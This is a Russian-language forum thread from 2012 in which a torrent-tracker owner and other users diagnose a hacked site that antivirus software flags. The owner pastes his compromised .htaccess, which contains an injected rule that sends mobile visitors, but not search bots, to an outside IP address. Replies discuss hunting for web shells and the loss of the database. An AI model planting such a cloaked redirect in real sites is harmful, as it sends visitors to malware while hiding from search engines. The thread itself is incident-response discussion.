Вопрос Вредоносные ссылки

dhonchik · 07.08.2012, 07:34 **Вверх**

Привет всем, как выловить вредоносные ссылки, с недавних пор, неделю назад примерно, пользователем у которых каспер, он стал при заходе на сайт выдавать что ссылка вредоносная, ругается на сайт и не заходит с телефонных браузеров, просит чтото скачать, как эти ссылки поубивать?

Одна поправка что это на трекере, но там от булки отличий по коду мало)

Marconi · 07.08.2012, 08:09 **Вверх**

dhonchik, посмотри какие скрипты устанавливал последними.
В них надо покопаться.
Ссылка сама появится не может.

dhonchik · 07.08.2012, 08:15 **Вверх**

Сообщение от Marconi

посмотри какие скрипты устанавливал последними.

я ставил в этот период, недели две назад, токо код тизерки адвмаркет, но код я удалил, а после этого стало юзерам писать про вредоносные ссылки, как их теперь выкурить и связано ли это с тизеркой я не знаю)

У кого каспер гляньте сами, вот трекер и попробуйте зайти с мобильного браузера:

weka · 07.08.2012, 12:38 **Вверх**

да касперыч блокирует

Нажми для просмотра

Luvilla · 07.08.2012, 13:10 **Вверх**

каспер ругается на /favicon.ico
virustotal.com там ничего не видит

Сообщение от dhonchik

не заходит с телефонных браузеров, просит чтото скачать

проверьте содержимое файла .хтаксесс

dhonchik · 07.08.2012, 13:58 **Вверх**

Сообщение от Luvilla

каспер ругается на /favicon.ico
virustotal.com там ничего не видит

Да я тоже проверил везде на вирусы, на вредные ссылки в вебмастере гугла и яши, ничего не нашло.

а вот то что ругается на фавикон, его надо удалить и сделать новый но уже на другом сайте?

Удалили фавикон, проверьте плиз заного, у меня нет каспера)

Добавлено через 3 минуты 32 секунды

Сообщение от Luvilla

проверьте содержимое файла .хтаксесс

Спасибо, там и вправду демон сидит

## Set charset server
AddDefaultCharset UTF-8

#RewriteEngine On

## Access control
<FilesMatch "\.(.*sql|tpl|inc|db|log)|(config|common).php$">
deny from all
</FilesMatch>
php_value allow_call_time_pass_reference On

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandex news|yandeximageresizer) [NC]
RewriteRule (.*) http://91.121.64.83/?2 [L,R=302]

То что я выделил удалил и теперь всё ровно, права 444 щас сделал на хтцасес, как же я вначале забыл, для форума поставил а на трекер забыл(

Luvilla · 07.08.2012, 17:54 **Вверх**

Сообщение от dhonchik

там и вправду демон сидит

а теперь начинается самое интересное: ищите, через что хакер получил доступ к перезаписи файла
это либо уязвимость движка/хаков; либо влезли через сервер
начните с поиска шеллов

dhonchik · 07.08.2012, 17:58 **Вверх**

Сообщение от Luvilla

начните с поиска шеллов

А как примерно хоть их искать?) это какие-то файлы левые?

Добавлено через 2 минуты 18 секунд

Luvilla, меня вот эти файлы беспокоят, токо щас их заметил, это шеллы?

1.php тоже подозрительный какйо-то, вот его содержимое

<?php
echo $_SERVER['DOCUMENT_ROOT'];
?>

dhonchik · 07.08.2012, 18:07 **Вверх**

Содержимое тех файлов что под стрелками интересное, как раз что то про фавикон

<?xml version="1.0"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>TorrentPier (Forum)</ShortName>
<Description>TorrentPier (Forum)</Description>
<InputEncoding>UTF-8</InputEncoding>
<Image height="16" width="16" type="image/x-icon">http://torrentpier.me/favicon.ico</Image>
<Url type="text/html" template="http://torrentpier.me/search.php?mode=results&show_results=topics&search_keywords={searchTerms}"/>
</OpenSearchDescription>

dhonchik · 07.08.2012, 21:02 **Вверх**

Трекер убили вместе с базой данных, хииии плять( ппц какой-то!

Marconi · 07.08.2012, 21:24 **Вверх**

dhonchik, так объясни причину для простых смертных.
Чего нельзя делать?
А то читаю тут как на китайском языке, нифига не понимаю.

Serberg · 07.08.2012, 22:23 **Вверх**

Сообщение от Marconi

А то читаю тут как на китайском языке, нифига не понимаю.

Залилии шел, бахнули базу и скрипт, конец фильма. Надо открывать бэкап за сутки назад и ковырять его на наличие шела.

Marconi · 07.08.2012, 22:25 **Вверх**

Serberg, а что такое шел?
Я заправку такую знаю))

dhonchik · 07.08.2012, 22:33 **Вверх**

Сообщение от Serberg

Залилии шел, бахнули базу и скрипт, конец фильма. Надо открывать бэкап за сутки назад и ковырять его на наличие шела.

Бэкап у меня есть, целиком, сегодня днём ещё успел сделать, но не додумался сделать бэкап базы данных, на работе загружен был, а её как раз грохнули вчером, все юзеры и темы с раздачами пропали, жесть(

dhonchik · 07.08.2012, 22:35 **Вверх**

а этот сраный шел может перелесть на другой сайт?, у меня там же где и трекер, ещё три сайта висят

Serberg · 07.08.2012, 22:47 **Вверх**

Сообщение от dhonchik

а этот сраный шел может перелесть на другой сайт?, у меня там же где и трекер, ещё три сайта висят

У меня был шел в базе данных, через него получили полный доступ к файловой системе. Естественно получив полный доступ к файловой системе можно снести все файлы.

dhonchik · 07.08.2012, 22:57 **Вверх**

Serberg, Может хостеру написать чтобы он попробовал найти шел этот? вдруг он и вправду не в папке с трекером был а в начале всех папок где нить(

и как теперь будут дела с индексацией, ведь старые страницы больше не будут действовать, а они всё ещё показываются что проиндексированы, мож плантону написать чтоб все страницы из индекса старые снял?

Marconi · 07.08.2012, 22:58 **Вверх**

dhonchik, почитай вот здесь
люди сталкивались, может поможет чем...

http://dle.net.ua/forum/index.php/to...dn3qpseorjsjpn

Luvilla · 07.08.2012, 23:08 **Вверх**

Сообщение от dhonchik

и как теперь будут дела с индексацией, ведь старые страницы больше не будут действовать

хостерский бекап есть?
если поднять последний бекап, полный, файлы + БД, ничего не изменится

dhonchik · 07.08.2012, 23:21 **Вверх**

Сообщение от Luvilla

хостерский бекап есть?
если поднять последний бекап, полный, файлы + БД, ничего не изменится

Интересно, надо спросить, но у меня хостер мудазвон, отказался от айсикью, а на мыло отвечает раз в месяц ппц

Но мне нравится там скорость, всё моментом сайты летают, исппанель летает мигом и версия пхп и тд постоянно новая что обязательное требование к движку трекера

dhonchik · 08.08.2012, 08:59 **Вверх**

Интересно, новый трекер накотили а каспер снова ругается

bbegles · 08.08.2012, 10:09 **Вверх**

Сообщение от dhonchik

А как примерно хоть их искать?) это какие-то файлы левые?

Интересно а почему ты хак Инспектор файлов не ставил на форуме?

dhonchik · 08.08.2012, 10:20 **Вверх**

bbegles, потому что это не форум а трекер, все коды, футер и тд там похожи на булковские, но хаки не подходят а для трекера такого хака нету

dhonchik · 08.08.2012, 16:06 **Вверх**

а как может вебмастер отключить форум например, не зная пароля от панели хостинга, там где папки с сайтами и он же не админ на сайте и не модер, то есть не может попасть в админку никак, ниче не понимаю.

Кто то у меня ползает по папкам, или где то ползает, но паролей он точно не знает не от чего.

bbegles · 08.08.2012, 16:30 **Вверх**

dhonchik, если содержится шелл то отключить возможно